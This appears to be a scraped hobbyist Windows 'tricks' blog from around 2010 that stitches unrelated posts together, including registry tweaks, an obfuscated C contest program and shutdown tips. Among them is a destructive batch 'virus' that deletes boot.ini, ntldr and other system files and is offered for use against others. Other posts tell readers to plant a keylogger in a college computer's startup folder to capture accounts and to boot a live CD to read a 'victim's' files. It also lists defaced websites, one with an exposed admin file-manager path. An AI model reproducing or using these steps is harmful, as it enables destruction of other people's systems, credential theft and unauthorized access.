Like with De-Animator 1.0, one-time activated administrator privileges are required, if the application is ran for the first time in your system. CMOS De-Animator v2 now includes a self-test on its startup to check, whether the CMOS can be successfully accessed to. After successful execution with the status "Ready to go" visible, the application can be normally used even under non-privileged accounts on your machine (i.e. under an user account). This doesn't apply to Windows 98/ME, where the utility works instantly.


http://www.st-ware.com/files/p/deanimator2/De-CMOS2.exe

Pakistani hacked websites...By Indan Cyber Army

http://www.gulfamplastic.com/


http://primeimpex.com.pk/index.html


http://mobiletouch.com.pk/admin/include/FCKeditor/editor/filemanager/browser/default/


http://www.gulfamplastic.com/


Amazing cprogramming code

this code is amazing

This C program won the first prize in International obfuscated C code contest (IOCCC) held recently. can u guess the output of this prog?


#include
main(int t,char _,char *a)
{
return!0<3?main(-79,-13,a+main(-87,1-_,main(-86, 0, a+1 )+a)):1,t<_?main(t+1, _, a ):3,main ( -94, -27+t, a )&&t== 2 ?_<13 ?main ( 2, _+1, "%s %d %d\n" ):9:16:t<0?t<-72?main(_,t,"@n'+,#'/*{}w+/w#cdnr/+,{}r/*de}+,/*{*+,/w{%+,/w#q#n+,/#{l,+,/n{n+\,/+#n+,/#;#q#n+,/+k#;*+,/'r :'d*'3,}{w+K w'K:'+}e#';dq#'l q#'+d'K#!/\+k#;q#'r}eKK#}w'r}eKK{nl]'/#;#q#n'){)#}w'){){nl]'/+#n';d}rw' i;# ){n\l]!/n{n#'; r{#w'r nc{nl]'/#{l,+'K {rw' iK{;[{nl]'/w#q#\ n'wk nw'iwk{KK{nl]!/w{%'l##w#' i; :{nl]'/*{q#'ld;r'}{nlwb!/*de}'c \;;{nl'-{}rw]'/+,}##'*}#nc,',#nw]'/+kd'+e}+;\#'rdq#w! nr'/ ') }+}{rl#'{n' ')# }'+}##(!!/") :t<-50?_==*a?putchar(a[31]):main(-65,_,a+1):main((*a == '/')+t,_,a+1 ):0
 
 

output

On the fifth day of Christmas my true love gave to me
five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the sixth day of Christmas my true love gave to me
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the seventh day of Christmas my true love gave to me
sevean swans -swimming,
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the eighth day of Christmas my true love gave to me
eight maids a-milking, sevean swans -swimming,
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the ninth day of Christmas my true love gave to me
nine ladies dancing, eight maids a-milking, sevean swans -swimming,
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the tenth day of Christmas my true love gave to me
ten lords a-leaping,
nine ladies dancing, eight maids a-milking, sevean swans -swimming,
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the eleventh day of Christmas my true love gave to me
eleven pipers piping, ten lords a-leaping,
nine ladies dancing, eight maids a-milking, sevean swans -swimming,
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.

On the twelfth day of Christmas my true love gave to me
twelve drummers drumming, eleven pipers piping, ten lords a-leaping,
nine ladies dancing, eight maids a-milking, sevean swans -swimming,
six geese a-laying, five gold rings;
four calling birds, three french hens, two turtle doves
and a partridge in a pear tree.
 

Virus that crashesh pc

give this only to them who deserve it........
code----highly danger only option


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!

Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.


1. Copy the following (everything in the box) into notepad.


QUOTE
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"


2. Save the file as shutdown.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

shutdown and restart in no time !!!

i got a batch prgramm for u ppl who want to shut down their pc and restart in no time no matter how many applications thy r running


start>run>cmd......... dos shell will open

now type this commnad

shutdown -r -f -t00>shutdown.bat

this will creat a system .bat file in administratof folder just double click it and here u go restart of pc in no time at all ........... remove -r command and shutdown will happen withour following restart ......

this is simple and basic trick u can play with windows ....!!!!

shutdown command attributes

Shutdown –s
it will shutdown your computer in 30 seconds and display a message

shutdown –s –t 40
it will shutdown in 40 seconds but you can only go up to 86400 (24 hours) but if you make it 0 it will show no message and just shutdown

shutdown –s –c ”haha the computer is going to shutdown”
it will shutdown with a message in a box under the time

shutdown –l
it will just log you of the computer

shutdown -i
it will display the GUI shutdown window

shutdown –r
will restart the computer

shutdown –a
it will abort the shutdown

shutdown –f
will force all running applications to close

book - gient book of computer virus

book - gient book of computer virus

change tital bar of internet explorer.tasted .

change tital bar of internet explorer.tasted .

How to Change the Internet Explorer Title Bar Text--

Using the local policy editor you can change the Internet Explorer Title Bar Text either for the current user or for all users of the computer.

Click on Start and type gpedit.msc and hit enter to bring up the local policy editor.

If you want to edit the title bar text for your own user account, choose the User Configuration folder. If you want to edit the title bar text for all users on this computer, choose the Computer Configuration Folder.

Expand Windows Settings and expand Internet Explorer Maintenance and finally click on Browser User Interface.

In the right hand side of the console, Right click on Browser Title and choose Properties.

Check the box to "Customize Title Bars" and enter in the text you want to have displayed in the title bar.
so start editing xp

AIRTEL music via c program.

AIRTEL music via c program.

#include
#include
float main(void)
{
float A,Bb,D,G,F; A = 440; G = 780; Bb = 461; D = 586; F = 687;
sound(G); delay(500); nosound();
sound(G); delay(250); nosound();
sound(G); delay(250); nosound();
sound(G); delay(500); nosound();
sound(2*D); delay(500); nosound();
sound(2*A); delay(250); nosound();
sound(2*Bb); delay(250); nosound();
sound(2*A); delay(250); nosound();
sound(G); delay(250); nosound();
sound(F); delay(500); nosound();
sound(2*A); delay(500); nosound();
sound(G); delay(250); nosound();
sound(2*A); delay(250); nosound();
sound(G); delay(250); nosound();
sound(F); delay(250);
sound(G); delay(250);
sound(2*A); delay(250);
sound(2*Bb); delay(500);
sound(2*A); delay(500);
sound(G); delay(250);
sound(F); delay(250);
sound(D); delay(500);
nosound();
//end 1  

sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 2
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 3
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
return 0;

 

 /*

enjoy the music

save code in notepad is
airtel.c
open it with turbo c
compile code
run code
enjoy music

 */

autorun file

autorun file

 

suppose i write a cd and a file called abc.exe or abc.bat is there in that cd so i want to run that file automatically as i entered the cd in cd-rom. is it possible to make a autorun file for that particular file?

ans---
[AutoRun]
open=abc.exe




Save it as AUTORUN.ini...and write this file on to the cd.Your abc.exe wil run automatically wen you play u r cd.

hack xp

hack xp

u can hack xp ...its kids stuff..
hello friends,
many people wants 2 hack xp .

this is my way 2 do tht.
1>
get linux bootable cd.
ubuntu
or
pc linux os
.

2>boot from cd drive.
.

3>select option live cd..
this provides u GUI [GRAPHICAL USER INTERFACE]
of linux.
browse t system.
u can copy data 4m system via cd writing (not via pen drive.).
original xp remains untouched..


4dummeys
where to get live cd
go 2
www.ubuntu.com
they send u free cd of ubuntu..

i m bypassing windows password accessing files of victim without having its password.
details
:
main principal is tht in linux os.
installing procedure is different
when u put linux bootable cd in drive 2 load system.
1>it 1st opens desktop of linux its like demo of linux.
u.similar to desktop in windows.
u can click on my computer & open it
u can brows any drive of ur hard disk.
u can play songs
watch movies (present in tht pc..)
etc..
means full desktop features
2>if u like tht desktop u can install linux.
after installing linux there is no difference between demo desktop & new 1.
.
.
by using this feature u can access victims computer..without
password....& can copy data if u required.. ..

.
.
in xp :installation procedure is completely reverse.u need 2 install xp & then only u can open desktop
BUT NOT IN LINUX..1ST desktop & then installation
..
(u can also format his hard disk..)
thts as easy as i can tell u hope it helps... 

how to hack college computers...its the way

how to hack college computers...its the way

1>download keylogger
recommended golden keylogger
install it

if not installing
->
may be no privilege coz of system administrator
jus don care

install on your pc
copy destination folder from program files from your pc to college pc
consider you pest in d: drive of your college in directory student
now hackers work is here
write a batch code

echo off
start d:\student\keylogger.exe

save it as .bat
paste tht bat file in startup and hack all college accounts..... 

Saturday, September 18, 2010

How To Change Internet Explorer With Your Name


How To Change / Personalize Internet Explorer With Your / My Name

Make the Internet Explorer Display Your name on it

A sweet little hack into Microsoft’s Internet Explorer (IE) can personalize it especially for you – by carving your name on the top panel (the one that contains the website name and “Microsoft Internet Explorer” written on it). This cute customization can give you the extra edge – particularly if you want to show off to your friends or your siblings.

The above figure depicts the typical browser window for IE, where the default string of “Windows Internet Explorer” follows the website name. After you carry out the hack, you can change the title text to anything you want – for instance, your own name. As an example, see the figure below, which shows an IE window, but has the text “ABCXYZ” instead of the typical “Microsoft Internet Explorer”.

To perform this crafty hack, do the following:

1. Open the Registry Editor by entering regedit in the Run command.
2. Locate the registry key for the following tree-branch:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
3. Create a String registry value by the name Window Title.
4. Double click on Window Title, and enter the text you want to see in place of “Microsoft Internet Explorer” as its data.
5. Exit the Registry Editor and restart IE.

You will find that the browser window title now displays the text that you put in as the value data in Step 4 above.

magic of run and . key

START-->RUN-->(PUT A DOT ) ENTER.........U'LL FIND THE USER'S PROFILE FOLDER U R LOGGED IN AS


START-->RUN-->(PUT 2 DOTS) ENTER .........U'LL GO INTO DOCUMENTS AND SETTINGS...


START-->RUN-->(PUT 3 DOTS) ENTER .........U'LL GO INTO MY COMPUTER...

aUTODELETE tEMP fORLDER

aUTODELETE tEMP fORLDER

ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available

Locked folder using Batch Programming

Locked folder

/***********Start Copying here************/

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

/****************Stop Copying here*************/

Just follow the steps given below

1. Copy and paste the above code in Notepad.

2. Type your password in place of "Type your password here"

3. Save the file with *.bat extension instead of *.txt

4. Now double click to open the file.

5. When you open it, a new folder named Locker will be created in the same place.

6. Move all the folders and files you want to lock into this folder.

7. Now double click the batch file again and in the confirmation type 'y' to lock the folder, and the locker folder will disappear.

Whenever you want to unlock the folder, open the batch file and enter the password, the locker folder will reappear again.

Suspected Windows Processes :spayware worning

The following is a list of processes that are consistently spoofed. These processes may exist (and many do) legitimately on your PC. Just beware if such processes exist and you have never installed the application.

Suspect Windows Processes

adaware.exe
alevir.exe
arr.exe
ascv.exe
backWeb.exe bargains.exe
blss.exe
bootconf.exe
bpc.exe
brasil.exe
bundle.exe
bvt.exe
cfd.exe
cmd32.exe
cmesys.exe
datemanager.exe
dcomx.exe
divx.exe
dllreg.exe
dpps2.exe
dssagent.exe
emsw.exe
explore.exe
fsg_4104.exe
gator.exe
gmt.exe
hbinst.exe
hbsrv.exe
hxdl.exe
hxiul.exe
iedll.exe
iedriver.exe
iexplorer.exe
image.dll
infus.exe
infwin.exe
intdel.exe
isass.exe
istsvc.exe
jdbgmgr.exe
kazza.exe
keenvalue.exe
kernel32.exe
launcher.exe
loader.exe
mapisvc32.exe
md.exe

mfin32.exe
mmod.exe
mostat.exe
msapp.exe
msbb.exe
msblast.exe
mscache.exe
msccn32.exe
mscman.exe
msdm.exe
msiexec16.exe
mslagent.exe
mslaugh.exe
msmgt.exe
msmsgri32.exe
msrexe.exe
mssys.exe
msvxd.exe
netd32.exe
nssys32.exe
nstask32.exe
nsupdate.exe
onsrvr.exe
optimize.exe
patch.exe

pgmonitr.exe
powerscan.exe
prizesurfer.exe
prmt.exe
prmvr.exe
ray.exe
rb32.exe
rcsync.exe
run32dll.exe
rundll.exe
rundll16.exe
ruxdll32.exe
sahagent.exe
save.exe
savenow.exe
sc.exe
scam32.exe
scrsvr.exe
scvhost.exe
service.exe
showbehind.exe
skynetave.exe
soap.exe
spoler.exe
srng.exe
start.exe
stcloader.exe
support.exe
svc.exe
svchosts.exe
svshost.exe
system.exe
system32.exe
teekids.exe
trickler.exe
tsadbot.exe
tvmd.exe
tvtmd.exe
webdav.exe
win32.exe
win32us.exe
winactive.exe
win-bugsfix.exe
windows.exe
wininetd.exe
wininit.exe
winlogin.exe
winmain.exe
winnet.exe
winppr32.exe
winservn.exe
winssk32.exe
winstart.exe
winstart001.exe
wintsk32.exe
winupdate.exe
wnad.exe
wuamgrd.exe
wupdt.exe

Windows XP Speed Hacks

________________________________________
Tired of your slow window installation ? Has your PC been slowed  
to  death lately ? Follow these steps and make it fast and furious again..
Services You Can Disable

There are quite a few services you can disable from starting automatically.This would be
to speed up your boot time and free resources. They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.Some possibilities are:

Alerter
Application Management
Clipbook
Fast User Switching
Human Interface Devices
Indexing Service
Messenger
Net Logon
NetMeeting
QOS RSVP
Remote Desktop Help Session Manager
Remote Registry
Routing & Remote Access
SSDP Discovery Service
Universal Plug and Play Device Host
Web Client

Cleaning the Prefetch Directory

Windows XP has a new feature called Prefetch. This keeps a shortcut 
to recently used programs.
However it can fill up with old and obsolete programs.

To clean this periodically go to:

* Start / Run / Prefetch
* Press Ctrl-A
to highlight all the shorcuts
* Delete them

Not Displaying Logon, Logoff, Startup and Shutdown Status Messages

to turn these off:

* Start Regedit
* Go
to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\system
* If it is not already there, create a DWORD value named DisableStatusMessages
* Give it a value of 1

Clearing the Page File on Shutdown

* Click on the Start button
* Go
to the Control Panel
* Administrative Tools
* Local Security Policy
* Local Policies
* Click on Security Options
* Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
* Select "Enable"
* Reboot

For regedit users.....
If you want
to clear the page file on each shutdown:

* Start Regedit
* Go
to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memorymanagement\ClearPageFileAtShutdown
* Set the value
to 1

No GUI Boot
If you don't need to see the XP boot logo,
* Run MSCONFIG
* Click on the BOOT.INI tab
* Check the box for /NOGUIBOOT

Speeding the Startup of Some CD Burner Programs

If you use program other than the native Windows XP CD Burner software,you might be able to increase the speed that it loads.

* Go
to Control Panel / Administrative Tools / Services
* Double-click on IMAPI CD-Burning COM Service
* For the Startup Type, select Disabled
* Click on the OK button and then close the Services window

If you don't You should notice

Getting Rid of Unread Email Messages

to remove the Unread Email message by user's login names:

* Start Regedit
* For a single user: Go
to HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\UnreadMail
* For all users: Go
to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\UnreadMail
* Create a DWORD key called MessageExpiryDays
* Give it a value of 0

Decreasing Boot Time

Microsoft has made available a program
to analyze and decrease the time it takes  to boot to Windows XP.The program is called BootVis

* Uncompress the file.
* Run BOOTVIS.EXE
* For a starting point, run Trace / Next Boot + Driver Delays
* This will reboot your computer and provide a benchmark
* After the reboot, BootVis will take a minute or two
to show graphs of your system startup.
* Note how much time it takes for your system
to load (click on the red vertical line)
* Then run Trace / Optimize System
* Re-Run the Next Boot + Drive Delays

Note how much the time has decreased mine went from approximately 33
to 25 seconds.

Increasing Graphics Performance

By default, Windows XP turns on a lot of shadows, fades, slides etc to menu items.Most simply slow down their display.

to turn these off selectively:

* Right click on the My computer icon
* Select properties
* Click on the Advanced tab
* Under Performance, click on the Settings button
*
to turn them all of, select Adjust for best performance 
 My preference
 ... is to  leave them all off except for Show shadows under mouse pointer and Show window contents while dragging

Increasing System Performance

If you have 512 megs or more of memory, you can increase system performance
by having the core system kept in memory.

* Start Regedit
* Go
to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memorymanagement\DisablePagingExecutive
* Set the value
to be 1
* Reboot the
computer
Increasing File System Caching

to  increase the amount of memory Windows will locked for I/O operations:

* Start Regedit
* Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memory Management
* Edit the key IoPageLockLimit

Resolving Inability
to Add or Remove Programs

If a particular user cannot add or remove programs, there might be a simple registry edit need.

* Go
to   HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Uninstall
* Change the DWORD NoAddRemovePrograms
to 0 disable it

4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memory